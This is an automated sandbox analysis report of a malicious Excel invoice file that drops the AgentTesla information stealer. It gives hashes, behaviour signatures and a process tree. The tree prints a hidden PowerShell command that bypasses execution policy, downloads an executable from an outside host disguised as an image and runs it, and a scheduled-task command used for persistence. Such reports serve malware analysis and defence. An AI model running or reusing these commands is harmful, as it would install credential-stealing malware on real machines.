Analysis

  • max time kernel
    114s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    13-07-2020 14:17

General

  • Target

    INV+PL+BL-489492020.xls

  • Size

    192KB

  • MD5

    b379714e8daaf2673032f31b2a6abb07

  • SHA1

    b4f97dceff91b030a76dd19e45b91826fd382e86

  • SHA256

    4eaaf544257b0465bb8acff69b987abf00bd19a32fbc45bc0e57b8c66244553a

  • SHA512

    11e3989a2641872fb9a08f9d6d6af330eab9cc4c28a84b6801cfe91c56bc5c7fc224265e2afc6661a96cd8b71bd7298e53ae6b3440b4048600c15d131e6db6a4

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://crogtrt.com/i7/15601277.jpg

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Office loads VBA resources, possible macro or embedded object present
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\INV+PL+BL-489492020.xls
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    PID:608
    • C:\Windows\system32\cmd.exe
      cmd /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/i7/15601277.jpg',$env:Temp+'\dfge.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\dfge.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:452
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/i7/15601277.jpg',$env:Temp+'\dfge.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\dfge.exe')
        3⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Blacklisted process makes network request
        PID:296
        • C:\Users\Admin\AppData\Local\Temp\dfge.exe
          "C:\Users\Admin\AppData\Local\Temp\dfge.exe"
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Executes dropped EXE
          PID:1312
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LnqbjYKeoN" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA949.tmp"
            5⤵
            • Creates scheduled task(s)
            PID:1832
          • C:\Users\Admin\AppData\Local\Temp\dfge.exe
            "{path}"
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious behavior: EnumeratesProcesses
            • Executes dropped EXE
            PID:1888

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\dfge.exe

  • C:\Users\Admin\AppData\Local\Temp\dfge.exe

  • C:\Users\Admin\AppData\Local\Temp\dfge.exe

  • C:\Users\Admin\AppData\Local\Temp\tmpA949.tmp

  • \Users\Admin\AppData\Local\Temp\dfge.exe

  • memory/296-2-0x0000000000000000-mapping.dmp

  • memory/452-1-0x0000000000000000-mapping.dmp

  • memory/608-0-0x0000000006940000-0x0000000006A40000-memory.dmp

    Filesize

    1024KB

  • memory/1312-3-0x0000000000000000-mapping.dmp

  • memory/1312-7-0x0000000000000000-0x0000000000000000-disk.dmp

  • memory/1832-8-0x0000000000000000-mapping.dmp

  • memory/1888-11-0x0000000000400000-0x000000000044C000-memory.dmp

    Filesize

    304KB

  • memory/1888-12-0x0000000000446DAE-mapping.dmp

  • memory/1888-14-0x0000000000400000-0x000000000044C000-memory.dmp

    Filesize

    304KB

  • memory/1888-15-0x0000000000400000-0x000000000044C000-memory.dmp

    Filesize

    304KB